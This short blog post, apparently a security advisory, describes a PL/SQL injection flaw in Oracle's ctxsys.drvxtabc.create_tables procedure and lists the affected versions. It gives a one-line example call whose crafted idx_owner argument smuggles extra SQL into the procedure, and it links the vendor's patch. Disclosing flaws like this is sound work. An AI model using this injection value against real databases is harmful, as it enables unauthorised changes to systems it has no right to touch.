Vulnerable :
* Oracle version 9.2.0.8,
* Oracle version 9.2.0.8DV,
* Oracle version 10.1.0.5
* Oracle version 10.2.0.4
PL/SQL Injection found in procedure ctxsys.drvxtabc.create_tables:
ctxsys.drvxtabc.create_tables has 3 parameters
idx_owner - varchar2
idx_name - varchar2
idxid - number
idx_owner and idx_name are vulnerable to SQL Injection
Example:
exec ctxsys.drvxtabc.create_tables('SH"."SH2KERR" (X NUMBER)--','yyyyyyyyy',2);
Look :
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2009.html
Selasa, 02 Februari 2010
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar